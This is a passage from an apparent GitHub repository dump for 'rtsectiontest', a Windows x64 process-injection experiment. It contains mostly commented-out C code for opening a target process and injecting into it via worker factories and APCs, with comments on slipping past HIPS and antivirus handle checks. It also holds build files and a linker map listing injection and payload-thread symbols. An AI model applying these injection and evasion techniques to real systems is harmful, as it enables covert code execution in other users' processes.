440 | 	LARGE_INTEGER interval;
441 | 	//PHANDLE pPidList = NULL;
442 | 
443 | 	uProcess.Buffer = TARGET_PROCESS_NAME;
444 | 	uProcess.Length = sizeof(TARGET_PROCESS_NAME) - sizeof(UNICODE_NULL);
445 | 	uProcess.MaximumLength = sizeof(TARGET_PROCESS_NAME);
446 | 	InitializeObjectAttributes(&thrdAttr, NULL, 0, NULL, NULL);
447 | 	InitializeObjectAttributes(&completionAttr, NULL, 0, NULL, NULL);
448 | 	///The requested operation waits until you click a button.
449 | 	dispError(STATUS_PENDING);
450 | 	interval.QuadPart = -20000000;
451 | 	do {
452 | 		//do {
453 | 			status = openProcsByName(&hProcess, &uProcess, FALSE);
454 | 			//NtDelayExecution(FALSE, &interval);
455 | 		//} while (!status);
456 | 
457 | 		dispError(status);
458 | 		if (status)
459 | 			break;
460 | 		////NtTimer
461 | 		////if (status)
462 | 		////	break;
463 | 		//
464 | 		////NtGetC
465 | 		//cid.UniqueProcess = (HANDLE)5836;
466 | 		//cid.UniqueThread = (HANDLE)5840;
467 | 		//status = NtCreateIoCompletion(&hCompletion, IO_COMPLETION_ALL_ACCESS, &completionAttr, 2);
468 | 		//if (status)
469 | 		//	break;
470 | 		//
471 | 		//status = NtCreateWorkerFactory(&hProcess, SYNCHRONIZE, &completionAttr, hCompletion, INVALID_HANDLE_VALUE, (PUCHAR)RtlSetProcessIsCritical+3, (PVOID)NtAcceptConnectPort, 70, 1024*PAGE_SIZE, PAGE_SIZE);
472 | 		//if (status)
473 | 		//	break;
474 | 		//////status = NtGetNextThread(hProcess, NULL, THREAD_ALL_ACCESS, OBJ_CASE_INSENSITIVE, 0, &hProcess);
475 | 		//////status = NtOpenThread(&hProcess, THREAD_ALL_ACCESS, &thrdAttr, &cid);
476 | 		////
477 | 		//////status = NtQueueApcThreadEx(hProcess, NULL, (PVOID)RtlSetProcessIsCritical, NULL, NULL, NULL);
478 | 		////if (status)
479 | 		////	break;
480 | 
481 | 		//dispError(STATUS_XML_ENCODING_MISMATCH);
482 | 	} while (status);
483 | 	
484 | 	//if (*pPidList)
485 | 	//	NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pPidList, &memSize, MEM_RELEASE);
486 | 
487 | 	//if (status)
488 | 	//	dispError(status);
489 | 
490 | 	//dispError(status);
491 | 
492 | 
493 | 	//NtQueueApcThreadEx()
494 | 	//rvaToFileOffset()
495 | 	////selfUnmap();
496 | 	/////No image (except the own one) can be found...
497 | 	////dispError(STATUS_SECTION_NOT_IMAGE);
498 | 
499 | 	/////Initialize everything...
500 | 	////status = initializeSyscallTable();
501 | 	////if (status) {
502 | 	////	dispError(status);
503 | 	////	return;
504 | 	////}
505 | 	//////DebugPrint2A("%wZ pid = %llu", *pProcName, pid);
506 | 
507 | 	//////{
508 | 	//////	NtClose(*pProcess);
509 | 	//////	*pProcess = NULL;
510 | 	//////	return STATUS_UNSUCCESSFUL;
511 | 	//////}
512 | 	//////{    
513 | 	//////	NtClose(*pProcess);
514 | 	////////	*pProcess = NULL;
515 | 	////////	return status;
516 | 	////////}
517 | 
518 | 
519 | 
520 | 
521 | 
522 | 	////dispError(status);
523 | 
524 | 	//////status = injectIntoProcess(hProcess, hWorkerFactory, (ULONGLONG)&NtWaitForMultipleObjects, 200);
525 | 	//////if (!status) {
526 | 	//////	NtClose(hProcess);
527 | 	//////	break;
528 | 	//////}
529 | 	//////status = injectIntoProcess(hProcess, (ULONGLONG)&NtQueryValueKey, 3000);
530 | 	//////NtClose(hProcess);
531 | 	////
532 | 	//////if (!status)
533 | 	//////	break;
534 | 
535 | 	////InitializeObjectAttributes(&procAttr, NULL, 0, NULL, NULL);
536 | 	////cid.UniqueThread = (HANDLE)0;
537 | 	////cid.UniqueProcess = pid;
538 | 	///////Opening a process for full access might be less suspicious than opening with our real intentions.
539 | 	////status = NtOpenProcess(pProcess, PROCESS_ALL_ACCESS, &procAttr, &cid);
540 | 
541 | 	//if (useDebugPrivilege)
542 | 	//	///We don't have any clue if the privilege already was enabled,
543 | 	//	///so we simply restore the old status. Whether we do this call or not 
544 | 	//	///isn't anyhow related to the result of process opening.
545 | 	//	RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, oldValue, FALSE, &oldValue);
546 | 
547 | 	////if (status)
548 | 	////	return status;   ///Most likely STATUS_ACCESS_DENIED if
549 | 	////					 ///either we didn't specify the useDebugPrivilege flag when opening a cross session process
550 | 	////					 ///or if we tried to open an elevated process while running non-elevated.
551 | 
552 | 	////					 ///In x64 windows, HIPS or AV drivers have the possibility to legally
553 | 	////					 ///receive a notification if a process is about to open a handle to another process.
554 | 	////					 ///In those ObCallback routines they cannot completely deny the opening.
555 | 	////					 ///However, they are able to modify the access masks, so a handle supposed for VM operations still
556 | 	////					 ///will be lacking the PROCESS_VM_XXX rights, for example. If we therefore query the handle rights
557 | 	////					 ///we can still return an appropriate error if wasn't granted the rights we want
558 | 	////					 ///And are not going to fail at first when performing our process operations.
559 | 
560 | 
561 | 	///////Maybe, HIPS just wanted to deny PROCESS_TERMINATE/PROCESS_SUSPEND right?
562 | 	///////If so, we don't care. We're only interested in VM rights.
563 | 	////if (MIN_VM_ACCESS_MASK & ~processHandleInfo.GrantedAccess) {
564 | 	////	NtClose(*pProcess);
565 | 	////	*pProcess = NULL;
566 | 	////	return STATUS_UNSUCCESSFUL;
567 | 	////}
568 | 
569 | 	/////...and demonstrate that we have hopefully succeeded.
570 | 	////status = testNtapiTable();
571 | 	////if (status)
572 | 	////	dispError(status);
573 | }
574 | 
575 | //void testRoutine(void) {
576 | //	ULONG_PTR dummyVar;
577 | //	&dummyVar;
578 | //}


--------------------------------------------------------------------------------
/rtsectiontest/rtsectiontest.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Release|x64">
  5 |       <Configuration>Release</Configuration>
  6 |       <Platform>x64</Platform>
  7 |     </ProjectConfiguration>
  8 |   </ItemGroup>
  9 |   <PropertyGroup Label="Globals">
 10 |     <ProjectGuid>{16086A51-3A9D-41EF-B34B-1382E6EE808D}</ProjectGuid>
 11 |     <RootNamespace>rtsectiontest</RootNamespace>
 12 |     <WindowsTargetPlatformVersion>10.0.10240.0</WindowsTargetPlatformVersion>
 13 |   </PropertyGroup>
 14 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 15 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 16 |     <ConfigurationType>Application</ConfigurationType>
 17 |     <UseDebugLibraries>false</UseDebugLibraries>
 18 |     <PlatformToolset>v140</PlatformToolset>
 19 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 20 |     <CharacterSet>Unicode</CharacterSet>
 21 |     <UseOfMfc />
 22 |   </PropertyGroup>
 23 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 24 |   <ImportGroup Label="ExtensionSettings">
 25 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 26 |   </ImportGroup>
 27 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 28 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 29 |   </ImportGroup>
 30 |   <PropertyGroup Label="UserMacros" />
 31 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 32 |     <LinkIncremental>false</LinkIncremental>
 33 |     <GenerateManifest>false</GenerateManifest>
 34 |     <IncludePath>$(ProjectDir);$(IncludePath)</IncludePath>
 35 |     <CustomBuildBeforeTargets>BuildLink</CustomBuildBeforeTargets>
 36 |     <CustomBuildAfterTargets>Compile</CustomBuildAfterTargets>
 37 |   </PropertyGroup>
 38 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 39 |     <ClCompile>
 40 |       <WarningLevel>Level4</WarningLevel>
 41 |       <Optimization>MinSpace</Optimization>
 42 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 43 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 44 |       <SDLCheck>
 45 |       </SDLCheck>
 46 |       <DebugInformationFormat>None</DebugInformationFormat>
 47 |       <CompileAsWinRT>false</CompileAsWinRT>
 48 |       <InlineFunctionExpansion>Disabled</InlineFunctionExpansion>
 49 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
 50 |       <OmitFramePointers>true</OmitFramePointers>
 51 |       <ExceptionHandling>false</ExceptionHandling>
 52 |       <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
 53 |       <BufferSecurityCheck>false</BufferSecurityCheck>
 54 |       <FloatingPointModel>Fast</FloatingPointModel>
 55 |       <FloatingPointExceptions>false</FloatingPointExceptions>
 56 |       <CreateHotpatchableImage>false</CreateHotpatchableImage>
 57 |       <RuntimeTypeInfo>false</RuntimeTypeInfo>
 58 |       <CallingConvention>StdCall</CallingConvention>
 59 |       <CompileAs>CompileAsC</CompileAs>
 60 |       <OmitDefaultLibName>true</OmitDefaultLibName>
 61 |       <PreprocessorDefinitions>_UNICODE;UNICODE;_WIN64;_AMD64_;AMD64;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 62 |     </ClCompile>
 63 |     <Link>
 64 |       <GenerateDebugInformation>Debug</GenerateDebugInformation>
 65 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 66 |       <OptimizeReferences>true</OptimizeReferences>
 67 |       <AdditionalDependencies>$(ProjectDir)Libraries\myntdll.bin</AdditionalDependencies>
 68 |       <IgnoreAllDefaultLibraries>true</IgnoreAllDefaultLibraries>
 69 |       <LargeAddressAware>true</LargeAddressAware>
 70 |       <EntryPointSymbol>mymain</EntryPointSymbol>
 71 |       <FixedBaseAddress>false</FixedBaseAddress>
 72 |       <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
 73 |       <Version>6.1</Version>
 74 |       <SubSystem>Windows</SubSystem>
 75 |       <LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>
 76 |       <FunctionOrder>
 77 |       </FunctionOrder>
 78 |       <GenerateMapFile>true</GenerateMapFile>
 79 |     </Link>
 80 |     <ProjectReference>
 81 |       <LinkLibraryDependencies>false</LinkLibraryDependencies>
 82 |     </ProjectReference>
 83 |     <CustomBuildStep>
 84 |       <Command>ml64</Command>
 85 |     </CustomBuildStep>
 86 |     <PreBuildEvent>
 87 |       <Command>
 88 |       </Command>
 89 |     </PreBuildEvent>
 90 |     <PreLinkEvent>
 91 |       <Command>
 92 |       </Command>
 93 |     </PreLinkEvent>
 94 |     <MASM>
 95 |       <MakeAllSymbolsPublic>true</MakeAllSymbolsPublic>
 96 |     </MASM>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemGroup>
 99 |     <ClInclude Include="auxfuncs.h" />
100 |     <ClInclude Include="global.h" />
101 |   </ItemGroup>
102 |   <ItemGroup>
103 |     <ClCompile Include="main.c" />
104 |   </ItemGroup>
105 |   <ItemGroup>
106 |     <None Include="Libraries\myntdll.bin" />
107 |     <MASM Include="auxfuncs.asm">
108 |       <FileType>Document</FileType>
109 |     </MASM>
110 |   </ItemGroup>
111 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
112 |   <ImportGroup Label="ExtensionTargets">
113 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
114 |   </ImportGroup>
115 | </Project>


--------------------------------------------------------------------------------
/rtsectiontest/rtsectiontest.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Libraries">
13 |       <UniqueIdentifier>{f3f02b50-269a-49a1-aeae-d35a0a3581ea}</UniqueIdentifier>
14 |     </Filter>
15 |   </ItemGroup>
16 |   <ItemGroup>
17 |     <ClInclude Include="global.h">
18 |       <Filter>Header Files</Filter>
19 |     </ClInclude>
20 |     <ClInclude Include="auxfuncs.h">
21 |       <Filter>Header Files</Filter>
22 |     </ClInclude>
23 |   </ItemGroup>
24 |   <ItemGroup>
25 |     <ClCompile Include="main.c">
26 |       <Filter>Source Files</Filter>
27 |     </ClCompile>
28 |   </ItemGroup>
29 |   <ItemGroup>
30 |     <None Include="Libraries\myntdll.bin">
31 |       <Filter>Libraries</Filter>
32 |     </None>
33 |   </ItemGroup>
34 |   <ItemGroup>
35 |     <MASM Include="auxfuncs.asm">
36 |       <Filter>Source Files</Filter>
37 |     </MASM>
38 |   </ItemGroup>
39 | </Project>


--------------------------------------------------------------------------------
/rtsectiontest/rtsectiontest.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup>
4 |     <ShowAllFiles>false</ShowAllFiles>
5 |   </PropertyGroup>
6 | </Project>


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/auxfuncs.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/auxfuncs.obj


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/main.obj


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\main.obj
 2 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.exe
 3 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.map
 4 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\x64\release\rtsectiontest.pdb
 5 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\auxfuncs.obj
 6 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.command.1.tlog
 7 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.read.1.tlog
 8 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\cl.write.1.tlog
 9 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.command.1.tlog
10 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.read.1.tlog
11 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\link.write.1.tlog
12 | c:\users\microwavestd\documents\visual studio 2015\projects\um\rtsectiontest\rtsectiontest\x64\release\rtsectiontest.tlog\rtsectiontest.write.1u.tlog
13 | 


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.log:
--------------------------------------------------------------------------------
 1 | Build started 26.10.2015 04:32:15.
 2 |      1>Project "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\rtsectiontest.vcxproj" on node 2 (Rebuild target(s)).
 3 |      1>_MASM:
 4 |          Assembling auxfuncs.asm...
 5 |          cmd.exe /C "C:\Users\MicrowaveStd\AppData\Local\Temp\tmpee9f7f8c528b4447b7324d0ebdc7dc6c.cmd"
 6 |          ml64.exe /c /nologo /Zf /Zi /Fo"x64\Release\auxfuncs.obj" /W3 /errorReport:prompt  /Taauxfuncs.asm
 7 |        ClCompile:
 8 |          C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\CL.exe /c /nologo /W4 /WX- /O1 /Ob0 /Oi /Os /Oy /GL /D _UNICODE /D UNICODE /D _WIN64 /D _AMD64_ /D AMD64 /D _UNICODE /D UNICODE /Gm- /MDd /GS- /Gy /fp:fast /fp:except- /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"x64\Release\\" /Fd"x64\Release\vc140.pdb" /Gz /TC /Zl /errorReport:prompt main.c
 9 |          main.c
10 |      1>main.c(225): warning C4054: 'type cast': from function pointer 'NTSTATUS (__cdecl *)(PHANDLE,ACCESS_MASK,POBJECT_ATTRIBUTES,HANDLE,PTHREAD_START_ROUTINE,PVOID,BOOLEAN,ULONG_PTR,SIZE_T,SIZE_T,PVOID)' to data pointer 'PNT_SYSCALL_STUB'
11 |      1>main.c(226): warning C4054: 'type cast': from function pointer 'NTSTATUS (__cdecl *)(HANDLE,PVOID *,SIZE_T *,ULONG,PULONG)' to data pointer 'PNT_SYSCALL_STUB'
12 |        Link:
13 |          C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\link.exe /ERRORREPORT:PROMPT /OUT:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.exe" /VERSION:"6.1" /INCREMENTAL:NO /NOLOGO "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\Libraries\myntdll.bin" /NODEFAULTLIB /MANIFEST:NO /DEBUG /PDB:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.pdb" /MAP /SUBSYSTEM:WINDOWS /LARGEADDRESSAWARE /OPT:REF /OPT:ICF /LTCG /TLBID:1 /ENTRY:"mymain" /DYNAMICBASE /FIXED:NO /NXCOMPAT /IMPLIB:"C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.lib" /MACHINE:X64 /SAFESEH:NO x64\Release\main.obj
14 |          x64\Release\auxfuncs.obj
15 |          Generating code
16 |          Finished generating code
17 |          rtsectiontest.vcxproj -> C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\x64\Release\rtsectiontest.exe
18 |      1>Done Building Project "C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\rtsectiontest\rtsectiontest.vcxproj" (Rebuild target(s)).
19 | 
20 | Build succeeded.
21 | 
22 | Time Elapsed 00:00:02.71
23 | 


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
2 | Release|x64|C:\Users\MicrowaveStd\Documents\Visual Studio 2015\Projects\um\rtsectiontest\|
3 | 


--------------------------------------------------------------------------------
/rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/rtsectiontest/x64/Release/rtsectiontest.tlog/rtsectiontest.write.1u.tlog


--------------------------------------------------------------------------------
/x64/Release/rtsectiontest.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Microwave89/rtsectiontest/fe36fd2403c69db6d9024f95282fc9d2a60caa2d/x64/Release/rtsectiontest.exe


--------------------------------------------------------------------------------
/x64/Release/rtsectiontest.map:
--------------------------------------------------------------------------------
  1 |  rtsectiontest
  2 | 
  3 |  Timestamp is 562d9ec2 (Mon Oct 26 04:32:18 2015)
  4 | 
  5 |  Preferred load address is 0000000140000000
  6 | 
  7 |  Start         Length     Name                   Class
  8 |  0001:00000000 000008f7H .text$mn                CODE
  9 |  0002:00000000 000000b8H .idata$5                DATA
 10 |  0002:000000c0 00000074H .rdata                  DATA
 11 |  0002:00000134 0000017cH .rdata$zzzdbg           DATA
 12 |  0002:000002b0 0000005cH .xdata                  DATA
 13 |  0002:0000030c 00000000H .edata                  DATA
 14 |  0002:0000030c 00000014H .idata$2                DATA
 15 |  0002:00000320 00000014H .idata$3                DATA
 16 |  0002:00000338 000000b8H .idata$4                DATA
 17 |  0002:000003f0 00000200H .idata$6                DATA
 18 |  0003:00000000 000001b2H .data                   DATA
 19 |  0003:000001c0 00000c10H .bss                    DATA
 20 |  0004:00000000 0000003cH .pdata                  DATA
 21 | 
 22 |   Address         Publics by Value              Rva+Base               Lib:Object
 23 | 
 24 |  0000:00000000       __guard_flags              0000000000000000     <absolute>
 25 |  0000:00000000       __guard_fids_count         0000000000000000     <absolute>
 26 |  0000:00000000       __guard_fids_table         0000000000000000     <absolute>
 27 |  0001:00000000       NtCurrentTeb               0000000140001000 f i main.obj
 28 |  0001:0000000c       dispError                  000000014000100c f   main.obj
 29 |  0001:0000003c       openWorkerFactory          000000014000103c f   main.obj
 30 |  0001:0000032c       injectIntoProcess          000000014000132c f   main.obj
 31 |  0001:000005fc       openProcsByName            00000001400015fc f   main.obj
 32 |  0001:00000898       mymain                     0000000140001898 f   main.obj
 33 |  0001:000008e0       mymemcmp                   00000001400018e0 f   auxfuncs.obj
 34 |  0002:00000000       __imp_LdrInitializeThunk   0000000140002000     myntdll:ntdll.dll
 35 |  0002:00000008       __imp_RtlCompareUnicodeString 0000000140002008     myntdll:ntdll.dll
 36 |  0002:00000010       __imp_NtFreeVirtualMemory  0000000140002010     myntdll:ntdll.dll
 37 |  0002:00000018       __imp_NtQuerySystemInformation 0000000140002018     myntdll:ntdll.dll
 38 |  0002:00000020       __imp_NtQueryInformationWorkerFactory 0000000140002020     myntdll:ntdll.dll
 39 |  0002:00000028       __imp_NtCreateThreadEx     0000000140002028     myntdll:ntdll.dll
 40 |  0002:00000030       __imp_NtOpenProcess        0000000140002030     myntdll:ntdll.dll
 41 |  0002:00000038       __imp_NtResumeProcess      0000000140002038     myntdll:ntdll.dll
 42 |  0002:00000040       __imp_NtAllocateVirtualMemory 0000000140002040     myntdll:ntdll.dll
 43 |  0002:00000048       __imp_NtWaitForWorkViaWorkerFactory 0000000140002048     myntdll:ntdll.dll
 44 |  0002:00000050       __imp_NtCreateIoCompletion 0000000140002050     myntdll:ntdll.dll
 45 |  0002:00000058       __imp_NtDelayExecution     0000000140002058     myntdll:ntdll.dll
 46 |  0002:00000060       __imp_NtRaiseHardError     0000000140002060     myntdll:ntdll.dll
 47 |  0002:00000068       __imp_NtReadVirtualMemory  0000000140002068     myntdll:ntdll.dll
 48 |  0002:00000070       __imp_NtClose              0000000140002070     myntdll:ntdll.dll
 49 |  0002:00000078       __imp_NtDuplicateObject    0000000140002078     myntdll:ntdll.dll
 50 |  0002:00000080       __imp_NtProtectVirtualMemory 0000000140002080     myntdll:ntdll.dll
 51 |  0002:00000088       __imp_NtCreateWorkerFactory 0000000140002088     myntdll:ntdll.dll
 52 |  0002:00000090       __imp_NtWriteVirtualMemory 0000000140002090     myntdll:ntdll.dll
 53 |  0002:00000098       __imp_NtQueryObject        0000000140002098     myntdll:ntdll.dll
 54 |  0002:000000a0       __imp_NtSetInformationWorkerFactory 00000001400020a0     myntdll:ntdll.dll
 55 |  0002:000000a8       __imp_NtSuspendProcess     00000001400020a8     myntdll:ntdll.dll
 56 |  0002:000000b0       \177ntdll_NULL_THUNK_DATA  00000001400020b0     myntdll:ntdll.dll
 57 |  0002:000000c0       ??_C@_1BK@NBNJEGII@?$AAi?$AAe?$AAx?$AAp?$AAl?$AAo?$AAr?$AAe?$AA?4?$AAe?$AAx?$AAe?$AA?$AA@ 00000001400020c0     main.obj
 58 |  0002:0000030c       __IMPORT_DESCRIPTOR_ntdll  000000014000230c     myntdll:ntdll.dll
 59 |  0002:00000320       __NULL_IMPORT_DESCRIPTOR   0000000140002320     myntdll:ntdll.dll
 60 |  0003:00000000       injectionCode              0000000140003000 f   auxfuncs.obj
 61 |  0003:00000005       bootstrapRoutineBegin      0000000140003005 f   auxfuncs.obj
 62 |  0003:00000016       originalSyscallCode        0000000140003016 f   auxfuncs.obj
 63 |  0003:0000005f       syscallStub                000000014000305f f   auxfuncs.obj
 64 |  0003:0000007b       createPayloadThreadBegin   000000014000307b f   auxfuncs.obj
 65 |  0003:0000007b       fpCreatePayloadThread      000000014000307b f   auxfuncs.obj
 66 |  0003:000000e5       ntCreateThreadExNumber     00000001400030e5 f   auxfuncs.obj
 67 |  0003:000000f3       createPayloadThreadEnd     00000001400030f3 f   auxfuncs.obj
 68 |  0003:000000f3       ldrInitializeThunkAddr     00000001400030f3 f   auxfuncs.obj
 69 |  0003:000000fb       ntdllRxBaseAddr            00000001400030fb f   auxfuncs.obj
 70 |  0003:00000103       protSize                   0000000140003103 f   auxfuncs.obj
 71 |  0003:0000010b       origProt                   000000014000310b f   auxfuncs.obj
 72 |  0003:00000168       ntProtectVirtMemNumber     0000000140003168 f   auxfuncs.obj
 73 |  0003:00000182       bootstrapRoutineEnd        0000000140003182 f   auxfuncs.obj
 74 | 
 75 |  entry point at        0001:00000898
 76 | 
 77 |  Static symbols
 78 | 
 79 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 80 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 81 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 82 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 83 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 84 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 85 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 86 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 87 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 88 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 89 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 90 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 91 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 92 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 93 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 94 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 95 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 96 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 97 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 98 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
 99 |  0000:ffffb000       .debug$S                   0000000140000000     myntdll:ntdll.dll
